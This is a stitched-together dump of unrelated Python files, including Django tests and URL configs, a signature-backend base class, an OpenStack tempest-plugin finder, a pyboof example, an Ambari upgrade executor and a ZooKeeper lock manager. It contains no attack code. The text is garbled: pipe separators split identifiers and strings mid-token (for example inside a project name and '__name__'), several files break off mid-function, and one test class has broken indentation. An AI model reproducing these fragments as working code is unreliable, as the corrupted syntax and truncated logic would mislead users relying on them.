    # print(polygon2points(lP[0]))
|
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
from categories.models import Category
class TestCategoryAdmin(TestCase):
    """Admin smoke tests: create a root category, rename it, then add and
    rename a child category through the Django admin form views."""

    def setUp(self):
        self.client = Client()

    def test_adding_parent_and_child(self):
        # The admin views require an authenticated superuser.
        User.objects.create_superuser('testuser', 'testuser@example.com', 'password')
        self.client.login(username='testuser', password='password')
        add_url = reverse('admin:categories_category_add')
        form_data = {
            'parent': '',
            'name': "Parent",
            'thumbnail': '',
            'filename': '',
            'active': 'on',
            'alternate_title': '',
            'alternate_url': '',
            'description': '',
            'meta_keywords': '',
            'meta_extra': '',
            'order': 0,
            'slug': 'parent',
            '_save': '_save',
        }
        # Create the parent; a 302 redirect means the form was accepted.
        response = self.client.post(add_url, data=form_data)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(1, Category.objects.count())
        # Rename the parent in place; the row count must not change.
        form_data.update({'name': 'Parent (Changed)'})
        change_url = reverse('admin:categories_category_change', args=(1,))
        response = self.client.post(change_url, data=form_data)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(1, Category.objects.count())
        # Attach a child to the parent created above.
        form_data.update({
            'parent': '1',
            'name': 'Child',
            'slug': 'child',
        })
        response = self.client.post(add_url, data=form_data)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(2, Category.objects.count())
        # Rename the child; still exactly two categories in total.
        form_data.update({'name': 'Child (Changed)'})
        change_url = reverse('admin:categories_category_change', args=(2,))
        response = self.client.post(change_url, data=form_data)
        self.assertEqual(response.status_code, 302)
        self.assertEqual(2, Category.objects.count())
|
"""Base material for signature backends."""
from django.urls import reverse
class SignatureBackend(object):
    """Encapsulate signature workflow and integration with vendor backend.

    A typical workflow looks like this:

    * a :class:`~django_anysign.models.SignatureType` instance is created,
      carrying the backend type and its configuration;
    * a :class:`~django_anysign.models.Signature` instance is created; its
      signature type attribute gives it a backend;
    * signers are notified (email, text, or whatever) with a hyperlink to the
      "signer view", whose URL may vary depending on the backend;
    * a signer opens the backend's "signer view" entry point: typically a
      view embedding a backend-specific form to sign a document;
    * most backends have a "notification view" for the third-party service to
      signal updates;
    * most backends have a "signer return view" where the signer is
      redirected when the signature process ends, whatever the status;
    * the backend-specific workflow can span several views: it starts with a
      Signature instance carrying data (typically a document) and ends with
      that Signature done.
    """

    def __init__(self, name, code, url_namespace='anysign', **kwargs):
        """Configure backend.

        :param name: human-readable name.
        :param code: machine-readable name; lowercase alphanumeric only,
            i.e. PEP-8 compliant.
        :param url_namespace: namespace used for URL resolution.
        """
        self.name = name
        self.code = code
        self.url_namespace = url_namespace

    def send_signature(self, signature):
        """Initiate the signature process for a configured ``signature``.

        Typical implementations send the signer URL to the first signer.
        Raises ``NotImplementedError`` when the backend does not support
        this feature.
        """
        raise NotImplementedError()

    def get_signer_url(self, signer):
        """Return URL where signer signs document.

        Raises ``NotImplementedError`` when the backend has no "signer view".
        Default implementation reverses :meth:`get_signer_url_name` with
        ``signer.pk`` as argument.
        """
        url_name = self.get_signer_url_name()
        return reverse(url_name, args=[signer.pk])

    def get_signer_url_name(self):
        """Return URL name where signer signs document.

        Defaults to ``<url_namespace>:signer``.
        """
        return '%s:signer' % self.url_namespace

    def get_signer_return_url(self, signer):
        """Return absolute URL where signer is redirected after signing.

        The URL must be **absolute**: it is typically handed to an external
        signature service, which redirects the signer back to (this) `Django`
        website once the document(s) are signed.

        Default implementation reverses :meth:`get_signer_return_url_name`
        with ``signer.pk`` as argument.
        """
        url_name = self.get_signer_return_url_name()
        return reverse(url_name, args=[signer.pk])

    def get_signer_return_url_name(self):
        """Return URL name of the post-signature redirect target.

        Defaults to ``<url_namespace>:signer_return``.
        """
        return '%s:signer_return' % self.url_namespace

    def get_signature_callback_url(self, signature):
        """Return URL where backend can post signature notifications.

        Default implementation reverses
        :meth:`get_signature_callback_url_name` with ``signature.pk``.
        """
        url_name = self.get_signature_callback_url_name()
        return reverse(url_name, args=[signature.pk])

    def get_signature_callback_url_name(self):
        """Return URL name where backend can post signature notifications.

        Defaults to ``<url_namespace>:signature_callback``.
        """
        return '%s:signature_callback' % self.url_namespace

    def create_signature(self, signature):
        """Register ``signature`` in backend, return updated object.

        Backends that store a signature object should update
        :attr:`~django_anysign.models.Signature.signature_backend_id`.
        Base implementation is a passthrough: override in backends.
        """
        return signature
|
#! /usr/bin/env python
# Copyright 2016 Hewlett Packard Enterprise Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# This script is intended to be run as part of a periodic proposal bot
# job in OpenStack infrastructure.
#
# In order to function correctly, the environment in which the
# script runs must have
# * network access to the review.opendev.org Gerrit API
# working directory
# * network access to https://opendev.org/openstack
import json
import re
import sys
import urllib3
from urllib3.util import retry
# List of projects having tempest plugin stale or unmaintained for a long time
# (6 months or more)
# TODO(masayukig): Some of these can be removed from BLACKLIST in the future
# when the patches are merged.
BLACKLIST = [
'x/gce-api', # It looks gce-api doesn't support python3 yet.
'x/glare', # To avoid sanity-job failure
'x/group-based-policy', # It looks this doesn't support python3 yet.
'x/intel-nfv-ci-tests', # https://review.opendev.org/#/c/634640/
'op | enstack/networking-generic-switch',
# https://review.opendev.org/#/c/634846/
'openstack/networking-l2gw-tempest-plugin',
# https://review.opendev.org/#/c/635093/
'openstack/networking-midonet', # https://review.opendev.org/#/c/635096/
'x/networking-plumgrid', # https://review.opendev.org/#/c/635096/
'x/networking-spp', # https://review.opendev.org/#/c/635098/
'openstack/neutron-dynamic-routing',
# https://review.opendev.org/#/c/637718/
'o | penstack/neutron-vpnaas', # https://review.opendev.org/#/c/637719/
'x/tap-as-a-service', # To avoid sanity-job failure
'x/valet', # https://review.opendev.org/#/c/638339/
'x/kingbird', # https://bugs.launchpad.net/kingbird/+bug/1869722
# vmware-nsx is blacklisted since https://review.opendev.org/#/c/736952
'x/vmware-nsx-tempest-plugin',
]
url = 'https://review.opendev.org/projects/'
# This is what a project looks like
'''
"openstack-attic/akanda": {
"id": "openstack-attic%2Fakanda",
"state": "READ_ONLY"
},
'''
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')
retries = retry.Retry(status_forcelist=[500], backoff_factor=1.0)
def has_tempest_plugin(proj):
    """Return True if the given project declares a tempest plugin.

    Fetches the project's master-branch setup.cfg from opendev and looks for
    a ``tempest.test_plugins`` entry-point section.

    :param proj: project path, e.g. 'openstack/neutron'
    :raises urllib3.exceptions.MaxRetryError: for non-404 HTTP failures.
    """
    try:
        r = http.request('GET', "https://opendev.org/%s/raw/branch/"
                         "master/setup.cfg" % proj, retries=retries)
        # A missing setup.cfg simply means "no plugin here".
        if r.status == 404:
            return False
    except urllib3.exceptions.MaxRetryError as err:
        # We should not ignore non 404 errors.
        raise err
    p = re.compile(r'^tempest\.test_plugins', re.M)
    if p.findall(r.data.decode('utf-8')):
        return True
    else:
        # Bug fix: the original ended with a bare ``False`` expression and
        # implicitly returned None; return an explicit boolean instead.
        return False
# With the `blacklist` argument, just dump the blacklist and stop: no
# network access is needed in that mode.
if len(sys.argv) > 1 and sys.argv[1] == 'blacklist':
    for black_plugin in BLACKLIST:
        print(black_plugin)
    # We just need BLACKLIST when we use this `blacklist` option.
    # So, this exits here.
    sys.exit()

# Fetch the full project list from Gerrit.
r = http.request('GET', url, retries=retries)
# Gerrit prepends 4 garbage octets to the JSON, in order to counter
# cross-site scripting attacks. Therefore we must discard it so the
# json library won't choke.
content = r.data.decode('utf-8')[4:]
projects = sorted(json.loads(content))
# Retrieve projects having no deployment tool repo (such as deb,
# puppet, ansible, etc.), infra repos, ui or spec namespace as those
# namespaces do not contains tempest plugins.
projects_list = [i for i in projects if not (
    i.startswith('openstack-dev/') or
    i.startswith('openstack-infra/') or
    i.startswith('openstack/ansible-') or
    i.startswith('openstack/charm-') or
    i.startswith('openstack/cookbook-openstack-') or
    i.startswith('openstack/devstack-') or
    i.startswith('openstack/fuel-') or
    i.startswith('openstack/deb-') or
    i.startswith('openstack/puppet-') or
    i.startswith('openstack/openstack-ansible-') or
    i.startswith('x/deb-') or
    i.startswith('x/fuel-') or
    i.startswith('x/python-') or
    i.startswith('zuul/') or
    i.endswith('-ui') or
    i.endswith('-specs'))]
# Probe each remaining project's setup.cfg for a tempest plugin entry point.
found_plugins = list(filter(has_tempest_plugin, projects_list))
# We have tempest plugins not only in 'openstack/' namespace but also the
# other name spaces such as 'airship/', 'x/', etc.
# So, we print all of them here.
for project in found_plugins:
    print(project)
|
#!/usr/bin/env python3
import glob
import numpy as np
import pyboof as pb
# Scene recognition is defined here as the problem where you wish to find multiple views of the same scene
# In this example we will load a set of images that has sets of 3 related images. We will tell it to find the 5
# most similar images so that you can see what it does when it fails to find a good match
# Get a list of all images which we wish to search
# Get a list of all images which we wish to search
list_images = list(glob.glob("../data/example/recognition/scene/*.jpg"))
list_images.sort()
# Create an instance of SceneRecognition. This will take in images as input
recognizer = pb.FactorySceneRecognition(np.uint8).scene_recognition()
# First we need to create a model so that it knows how to describe a model. BoofCV does provide a
# pre-build model generated from vacation photos. This is fast enough that often its just easier to train it
# on the images you plan to search.
print("Learning the model. This can take a moment or two.")
recognizer.learn_model(list_images)
# Alternatively you can comment out the training code above and load
# a pre-built model by uncommenting the line below
# recognizer = pb.download_default_scene_recognition(np.uint8, "saved_models")
# Now add all the images that we wish to look up
print("Adding images to the database")
for image_file in list_images:
    boof_gray = pb.load_single_band(image_file, np.uint8)
    recognizer.add_image(image_file, boof_gray)
# Let's look one up and see which images are related
print("Making a query: ", list_images[6])
query_image = pb.load_single_band(list_images[6], np.uint8)
found_matches = recognizer.query(query_image, 5)
# We are expecting 3 matches to be first, then other two will be incorrect/noise
print("len={}".format(len(found_matches)))
print("\nResults:")
for m in found_matches:
    print("{:s} error={:f}".format(m["id"], m["error"]))
# Display the results
image_list = [(query_image, "Query")]
for m in found_matches:
    # Reload matches as planar (color) images for nicer display.
    image_list.append((pb.load_planar(m["id"], np.uint8), m["id"]))
pb.swing.show_list(image_list, title="Query Results")
input("Press any key to exit")
|
from app | import db
from sqlalchemy.dialects.postgresql import JSON
class ChBible(db.Model):
    """One row per Bible sentence, keyed by its bbid identifier."""

    __tablename__ = 'chbible'

    id = db.Column(db.Integer, primary_key=True)
    bbid = db.Column(db.String())
    snt = db.Column(db.String())
    snt_lg = db.Column(db.String())
    snt_sdg = db.Column(db.String())

    def __init__(self, bbid, snt, snt_lg, snt_sdg):
        # Bug fix: the original assigned ``bbid`` to a stray ``self.url``
        # attribute, so the bbid column was never populated and __repr__
        # showed an unset value for fresh instances.
        self.bbid = bbid
        self.snt = snt
        self.snt_lg = snt_lg
        self.snt_sdg = snt_sdg

    def __repr__(self):
        return '<id {0}> <{1}> {2}\n'.format(self.id, self.bbid, self.snt)
|
#!/usr/bin/env p | ython
# -*- coding: utf-8 -*-
from flask import Blueprint
main = Blueprint('main', __n | ame__)
from . import views, errors
|
# coding=utf-8
# -------------------------------------------------------------- | ------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if t | he code is
# regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages

# Package identity for the AutoRest-generated test service client.
NAME = "autorestresourceflatteningtestservice"
VERSION = "1.0.0"

# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools

# Runtime dependencies of the generated client.
REQUIRES = ["msrest>=0.2.0", "msrestazure>=0.2.1"]

setup(
    name=NAME,
    version=VERSION,
    description="AutoRestResourceFlatteningTestService",
    author_email="",
    url="",
    keywords=["Swagger", "AutoRestResourceFlatteningTestService"],
    install_requires=REQUIRES,
    packages=find_packages(),
    include_package_data=True,
    long_description="""\
Resource Flattening for AutoRest
"""
)
|
# hgversion.py - Version information for Mercurial
#
# Copyright 2009 Steve Borho <steve@borho.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2, incorporated herein by reference.
import re
# Detect the running Mercurial version across API generations.
try:
    # post 1.1.2
    from mercurial import util
    hgversion = util.version()
except AttributeError:
    # <= 1.1.2
    from mercurial import version
    hgversion = version.get_version()
# Space-separated Mercurial release series this TortoiseHg works with.
testedwith = '3.6 3.7'

def checkhgversion(v):
    """range check the Mercurial version"""
    supported = testedwith.split()
    # Strip any local-build suffix, e.g. "3.6+20-abcdef" -> "3.6".
    v = v.split('+')[0]
    if not v or v == 'unknown' or len(v) >= 12:
        # can't make any intelligent decisions about unknown or hashes
        return None
    major_minor = re.split(r'\.|-', v)[:2]
    if len(major_minor) < 2:
        return None
    if '.'.join(major_minor) in supported:
        return None
    return ('This version of TortoiseHg requires Mercurial version %s.n to '
            '%s.n, but found %s') % (supported[0], supported[-1], v)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2012 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE.TXT file)
from django.conf.urls import patterns, include, url
from apps.common.urls import arg_id, arg_slug, arg_username
# URL-pattern fragments capturing a link id and a username.
L = arg_id("link_id")
U = arg_username("username")

urlpatterns = patterns("apps.account.views",
    url(r"^account/profile$", "profile"),
    url(r"^account/view/%s$" % U, "view"),
    url(r"^account/set_passport$", "set_passport", { "wizard" : False }),
    url(r"^account/edit$", "edit", { "wizard" : False }),
    url(r"^account/link/create$", "link_create"),
    url(r"^account/link/delete/%s$" % L, "link_delete"),
    # this url because allauth redirects signed-in users here
    url(r"^accounts/profile/$", "edit", { "wizard" : True }),
    url(r"^account/wiz/passport", "set_passport", { "wizard" : True }),
)
|
# -*- coding: utf-8 -*-
"""
Cuttle, the simple, extendable ORM.
:lic | ense: MIT, see LIC | ENSE for details.
"""
# Package version (PEP 440 development release).
__version__ = '0.9.0.dev'
|
klin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Any Red Hat trademarks that are incorporated in the source
# code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission
# of Red Hat, Inc.
#
"""
anitya tests for the custom backend.
"""
import unittest
import mock
import anitya.lib.backends.npmjs as backend
from anitya.db import models
from anitya.lib.exceptions import AnityaPluginException
from anitya.tests.base import DatabaseTestCase, create_distro
BACKEND = "npmjs"
class NpmjsBackendtests(DatabaseTestCase):
"""Drupal backend tests."""
    def setUp(self):
        """Set up the test environment; runs before every test."""
        super(NpmjsBackendtests, self).setUp()
        # Each test relies on a distro plus the three npmjs projects below.
        create_distro(self.session)
        self.create_project()
def create_project(self):
"""Create some basic projects to work with."""
project = models.Project(
name="request",
homepage="https://www.npmjs.org/package/request",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="non-existent-package-that-does-not-exist",
homepage="https://www.npmjs.org/package/non-existent-package-that-does-not-exist",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
project = models.Project(
name="colors",
homepage="https://www.npmjs.org/package/colors",
backend=BACKEND,
)
self.session.add(project)
self.session.commit()
    def test_get_version(self):
        """Test the get_version function of the npmjs backend."""
        # Project 1 ("request") exists upstream: latest version is returned.
        pid = 1
        project = models.Project.get(self.session, pid)
        exp = "2.83.0"
        obs = backend.NpmjsBackend.get_version(project)
        self.assertEqual(obs, exp)
        # Project 2 does not exist upstream: the backend raises.
        pid = 2
        project = models.Project.get(self.session, pid)
        self.assertRaises(
            AnityaPluginException, backend.NpmjsBackend.get_version, project
        )
        # Project 3 ("colors") exists upstream as well.
        pid = 3
        project = models.Project.get(self.session, pid)
        exp = "1.2.0"
        obs = backend.NpmjsBackend.get_version(project)
        self.assertEqual(obs, exp)
    def test_get_version_url(self):
        """
        Assert that correct url is returned.
        """
        project = models.Project(
            name="test", homepage="https://example.org", backend=BACKEND
        )
        # The registry URL is derived from the project name only.
        exp = "https://registry.npmjs.org/test"
        obs = backend.NpmjsBackend.get_version_url(project)
        self.assertEqual(obs, exp)
    def test_get_version_not_modified(self):
        """Assert that not modified response is handled correctly"""
        pid = 1
        project = models.Project.get(self.session, pid)
        exp_url = "https://registry.npmjs.org/request"
        # An HTTP 304 means "nothing new": get_version returns None.
        with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
            m_call.return_value = mock.Mock(status_code=304)
            versions = backend.NpmjsBackend.get_version(project)
            m_call.assert_called_with(exp_url, last_change=None)
            self.assertEqual(versions, None)
    def test_get_versions(self):
        """Test the get_versions function of the npmjs backend."""
        # Project 1 ("request"): the full, ordered upstream version history.
        pid = 1
        project = models.Project.get(self.session, pid)
        exp = [
            "0.8.3",
            "0.9.0",
            "0.9.1",
            "0.9.5",
            "0.10.0",
            "1.0.0",
            "1.1.0",
            "1.1.1",
            "1.2.0",
            "1.9.0",
            "1.9.1",
            "1.9.2",
            "1.9.3",
            "1.9.5",
            "1.9.7",
            "1.9.8",
            "1.9.9",
            "2.0.0",
            "2.0.1",
            "2.0.2",
            "2.0.3",
            "2.0.4",
            "2.0.5",
            "2.1.0",
            "2.1.1",
            "2.2.0",
            "2.2.5",
            "2.2.6",
            "2.2.9",
            "2.9.0",
            "2.9.1",
            "2.9.2",
            "2.9.3",
            "2.9.100",
            "2.9.150",
            "2.9.151",
            "2.9.152",
            "2.9.153",
            "2.9.200",
            "2.9.201",
            "2.9.202",
            "2.9.203",
            "2.10.0",
            "2.11.0",
            "2.11.1",
            "2.11.2",
            "2.11.3",
            "2.11.4",
            "2.12.0",
            "2.14.0",
            "2.16.0",
            "2.16.2",
            "2.16.4",
            "2.16.6",
            "2.18.0",
            "2.19.0",
            "2.20.0",
            "2.21.0",
            "2.22.0",
            "2.23.0",
            "2.24.0",
            "2.25.0",
            "2.26.0",
            "2.27.0",
            "2.28.0",
            "2.29.0",
            "2.30.0",
            "2.31.0",
            "2.32.0",
            "2.33.0",
            "2.34.0",
            "2.35.0",
            "2.36.0",
            "2.37.0",
            "2.38.0",
            "2.39.0",
            "2.40.0",
            "2.41.0",
            "2.42.0",
            "2.43.0",
            "2.44.0",
            "2.45.0",
            "2.46.0",
            "2.47.0",
            "2.48.0",
            "2.49.0",
            "2.50.0",
            "2.51.0",
            "2.52.0",
            "2.53.0",
            "2.54.0",
            "2.55.0",
            "2.56.0",
            "2.57.0",
            "2.58.0",
            "2.59.0",
            "2.60.0",
            "2.61.0",
            "2.62.0",
            "2.63.0",
            "2.64.0",
            "2.65.0",
            "2.66.0",
            "2.67.0",
            "2.68.0",
            "2.69.0",
            "2.70.0",
            "2.71.0",
            "2.72.0",
            "2.73.0",
            "2.74.0",
            "2.75.0",
            "2.76.0",
            "2.77.0",
            "2.78.0",
            "2.79.0",
            "2.80.0",
            "2.81.0",
            "2.82.0",
            "2.83.0",
        ]
        obs = backend.NpmjsBackend.get_ordered_versions(project)
        self.assertEqual(obs, exp)
        # Project 2 does not exist upstream: the backend raises.
        pid = 2
        project = models.Project.get(self.session, pid)
        self.assertRaises(
            AnityaPluginException, backend.NpmjsBackend.get_versions, project
        )
        # Project 3 ("colors"): includes pre-release style versions.
        pid = 3
        project = models.Project.get(self.session, pid)
        exp = [
            "0.3.0",
            "0.5.0",
            "0.5.1",
            "0.6.0",
            "0.6.0-1",
            "0.6.1",
            "0.6.2",
            "1.0.0",
            "1.0.1",
            "1.0.2",
            "1.0.3",
            "1.1.0",
            "1.1.1",
            "1.1.2",
            "1.2.0-rc0",
            "1.2.0",
        ]
        obs = backend.NpmjsBackend.get_ordered_versions(project)
        self.assertEqual(obs, exp)
    def test_get_versions_not_modified(self):
        """Assert that not modified response is handled correctly"""
        pid = 1
        project = models.Project.get(self.session, pid)
        exp_url = "https://registry.npmjs.org/request"
        # An HTTP 304 yields an empty version list (contrast with
        # get_version, which returns None in the same situation).
        with mock.patch("anitya.lib.backends.BaseBackend.call_url") as m_call:
            m_call.return_value = mock.Mock(status_code=304)
            versions = backend.NpmjsBackend.get_versions(project)
            m_call.assert_called_with(exp_url, last_change=None)
            self.assertEqual(versions, [])
def test_npmjs_check_feed(self):
"""Test the check_feed method of the npmjs backend."""
generator = backend.NpmjsBackend.check_feed()
items = sorted(generator)
self.assertEqual(
items[0],
(
"2d-density",
"https://github.com/nilestanner/2d-density#readme",
"npmjs",
"1.0.0",
),
)
self.assertEqual(
items[1],
(
"2d-density",
"https://github.com/nilestanner/2d-density#readme",
"npmjs",
"1.0.1",
),
)
self.assertEqual(
items[2],
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import pprint
import re
from Grep import Grep
from StackVersionsFileHandler import StackVersionsFileHandler
# Module-level root logger and Grep helper (used to tail long command output).
logger = logging.getLogger()
grep = Grep()
class UpgradeExecutor:
  """ Class that performs the StackVersion stack upgrade"""

  # Script sub-directories executed in this order during an upgrade.
  SCRIPT_DIRS = [
    'pre-upgrade.d',
    'upgrade.d',
    'post-upgrade.d'
  ]

  # Sort key assigned to script filenames that do not start with a number;
  # such files sort last and stop execution when reached.
  NAME_PARSING_FAILED_CODE = 999

  def __init__(self, pythonExecutor, puppetExecutor, config):
    self.pythonExecutor = pythonExecutor
    self.puppetExecutor = puppetExecutor
    self.stacksDir = config.get('stack', 'upgradeScriptsDir')
    self.config = config
    versionsFileDir = config.get('agent', 'prefix')
    self.versionsHandler = StackVersionsFileHandler(versionsFileDir)

  def perform_stack_upgrade(self, command, tmpout, tmperr):
    """Run the stack upgrade described by ``command``.

    Returns a dict with 'exitcode', 'stdout' and 'stderr'; the output
    fields are tail-trimmed before returning.
    """
    logger.info("Performing stack upgrade")
    params = command['commandParams']
    srcStack = params['source_stack_version']
    tgtStack = params['target_stack_version']
    component = command['role']
    srcStackTuple = self.split_stack_version(srcStack)
    tgtStackTuple = self.split_stack_version(tgtStack)
    if srcStackTuple is None or tgtStackTuple is None:
      # One of the version strings could not be parsed: report and bail out.
      errorstr = "Source (%s) or target (%s) version does not match pattern \
<Name>-<Version>" % (srcStack, tgtStack)
      logger.info(errorstr)
      result = {
        'exitcode' : 1,
        'stdout' : 'None',
        'stderr' : errorstr
      }
    elif srcStack != tgtStack:
      # Flatten (name, major, minor) x 2 into the upgrade directory id.
      paramTuple = sum((srcStackTuple, tgtStackTuple), ())
      upgradeId = "%s-%s.%s_%s-%s.%s" % paramTuple
      # Check stack version (do we need upgrade?)
      basedir = os.path.join(self.stacksDir, upgradeId, component)
      if not os.path.isdir(basedir):
        errorstr = "Upgrade %s is not supported (dir %s does not exist)" \
          % (upgradeId, basedir)
        logger.error(errorstr)
        result = {
          'exitcode' : 1,
          'stdout' : errorstr,
          'stderr' : errorstr
        }
      else:
        result = {
          'exitcode' : 0,
          'stdout' : '',
          'stderr' : ''
        }
        # Request repos update (will be executed once before running any pp file)
        self.puppetExecutor.discardInstalledRepos()
        for dir in self.SCRIPT_DIRS:
          # Stop at the first failing phase.
          if result['exitcode'] != 0:
            break
          tmpRes = self.execute_dir(command, basedir, dir, tmpout, tmperr)
          # Accumulate exit code and concatenate phase output.
          result = {
            'exitcode' : result['exitcode'] or tmpRes['exitcode'],
            'stdout' : "%s\n%s" % (result['stdout'], tmpRes['stdout']),
            'stderr' : "%s\n%s" % (result['stderr'], tmpRes['stderr']),
          }
        if result['exitcode'] == 0:
          logger.info("Upgrade %s successfully finished" % upgradeId)
          self.versionsHandler.write_stack_version(component, tgtStack)
    else:
      infostr = "target_stack_version (%s) matches current stack version" \
        " for component %s, nothing to do" % (tgtStack, component)
      logger.info(infostr)
      result = {
        'exitcode' : 0,
        'stdout' : infostr,
        'stderr' : 'None'
      }
    # Trim long output to the last lines before handing back to the server.
    result = {
      'exitcode' : result['exitcode'],
      'stdout' : grep.tail(result['stdout'], grep.OUTPUT_LAST_LINES),
      'stderr' : grep.tail(result['stderr'], grep.OUTPUT_LAST_LINES)
    }
    return result

  def get_key_func(self, name):
    """
    Returns a number from filenames like 70-foobar.* or 999 for not matching
    filenames
    """
    parts = name.split('-', 1)
    if not parts or not parts[0].isdigit():
      logger.warn("Can't parse script filename number %s" % name)
      return self.NAME_PARSING_FAILED_CODE # unknown element will be placed to the end of list
    return int(parts[0])

  def split_stack_version(self, verstr):
    """Parse a JSON version string into (name, major, minor), or None when
    the version does not match <major>.<minor>."""
    verdict = json.loads(verstr)
    stack_name = verdict["stackName"].strip()
    matchObj = re.match( r'(\d+).(\d+)', verdict["stackVersion"].strip(), re.M|re.I)
    if matchObj:
      stack_major_ver = matchObj.group(1)
      stack_minor_ver = matchObj.group(2)
      return stack_name, stack_major_ver, stack_minor_ver
    else:
      return None

  def execute_dir(self, command, basedir, dir, tmpout, tmperr):
    """
    Executes *.py and *.pp files located in a given directory.
    Files a executed in a numeric sorting order.
    """
    dirpath = os.path.join(basedir, dir)
    logger.info("Executing %s" % dirpath)
    if not os.path.isdir(dirpath):
      # A missing phase directory is not an error: skip with a warning.
      warnstr = "Script directory %s does not exist, skipping" % dirpath
      logger.warn(warnstr)
      result = {
        'exitcode' : 0,
        'stdout' : warnstr,
        'stderr' : 'None'
      }
      return result
    fileList=os.listdir(dirpath)
    # Numeric prefix ("70-foo.py") determines execution order.
    fileList.sort(key = self.get_key_func)
    formattedResult = {
      'exitcode' : 0,
      'stdout' : '',
      'stderr' : ''
    }
    for filename in fileList:
      prevcode = formattedResult['exitcode']
      # Stop on the first failure or on the first unparsable filename.
      if prevcode != 0 or self.get_key_func(filename) == self.NAME_PARSING_FAILED_CODE:
        break
      filepath = os.path.join(dirpath, filename)
      if filename.endswith(".pp"):
        logger.info("Running puppet file %s" % filepath)
        result = self.puppetExecutor.run_manifest(command, filepath,
                                                  tmpout, tmperr)
      elif filename.endswith(".py"):
        logger.info("Running python file %s" % filepath)
        result = self.pythonExecutor.run_file(command, filepath, tmpout, tmperr)
      elif filename.endswith(".pyc"):
        pass # skipping compiled files
      else:
        warnstr = "Unrecognized file type, skipping: %s" % filepath
        logger.warn(warnstr)
        result = {
          'exitcode' : 0,
          'stdout' : warnstr,
          'stderr' : 'None'
        }
      formattedResult = {
        'exitcode' : prevcode or result['exitcode'],
        'stdout' : "%s\n%s" % (formattedResult['stdout'], result['stdout']),
        'stderr' : "%s\n%s" % (formattedResult['stderr'], result['stderr']),
      }
    logger.debug("Result of %s: \n %s" % (dirpath, pprint.pformat(formattedResult)))
    return formattedResult
|
from datetime import date
# Experiment parameters (exact semantics defined by the consuming scripts).
NTESTS = 1
PREV_DAYS = 10
# Presumably fractional price-move thresholds (1%) — confirm in consumer code.
PERCENT_UP = 0.01
PERCENT_DOWN = 0.01
PERIOD = 'Hourly' # [5-min, 15-min, 30-min, Hourly, 2-hour, 6-hour, 12-hour, Daily, Weekly]
MARKET = 'bitstampUSD'

# DATE START
YEAR_START = 2011
MONTH_START = 9
DAY_START = 13
DATE_START = date(YEAR_START, MONTH_START, DAY_START)

# DATE END
DATE_END = date.today()

# Base endpoint for fetching chart data from bitcoincharts.com.
URL_DATA_BASE = 'http://bitcoincharts.com/charts/chart.json?'
|
from contextlib import contextmanager
import logging
import os.path
import traceback
from kazoo.client import KazooClient
from kazoo.exceptions import (
LockTimeout,
NodeExistsError,
NoNodeError,
KazooException,
ZookeeperError,
)
from kazoo.retry import KazooRetry, RetryFailedError
from mastermind.utils.queue import LockingQueue
from mastermind_core import helpers
import msgpack
# from errors import ConnectionError, InvalidDataError
from lock import Lock
from sync.error import LockError, LockFailedError, LockAlreadyAcquiredError, InconsistentLockError
# Route kazoo's logging through the 'mm' logger handlers, at INFO level.
logger = logging.getLogger('mm')
kazoo_logger = logging.getLogger('kazoo')
kazoo_logger.propagate = False
# Idiom fix: the original used a list comprehension purely for its side
# effects; a plain loop states the intent and avoids building a throwaway list.
for handler in logger.handlers:
    kazoo_logger.addHandler(handler)
kazoo_logger.setLevel(logging.INFO)
class ZkSyncManager(object):
RETRIES = 2
LOCK_TIMEOUT = 3
    def __init__(self, host='127.0.0.1:2181', lock_path_prefix='/mastermind/locks/'):
        """Connect to zookeeper at ``host`` and remember the lock prefix.

        Re-raises whatever ``KazooClient.start()`` raises on connection
        failure, after logging it.
        """
        self.client = KazooClient(host, timeout=3)
        logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
            host, lock_path_prefix))
        try:
            self.client.start()
        except Exception as e:
            logger.error(e)
            raise
        # Retry policy shared by the persistent-lock helpers below.
        self._retry = KazooRetry(max_tries=self.RETRIES)
        self.lock_path_prefix = helpers.encode(lock_path_prefix)
    @contextmanager
    def lock(self, lockid, blocking=True, timeout=LOCK_TIMEOUT):
        """Context manager acquiring zookeeper lock ``lockid``.

        Raises LockAlreadyAcquiredError when the lock is held elsewhere,
        LockFailedError on acquisition timeout; other LockErrors are logged
        and re-raised.
        """
        lock = Lock(self.client, self.lock_path_prefix + lockid)
        try:
            acquired = lock.acquire(blocking=blocking, timeout=timeout)
            logger.debug('Lock {0} acquired: {1}'.format(lockid, acquired))
            if not acquired:
                # TODO: Change exception time or set all required parameters for
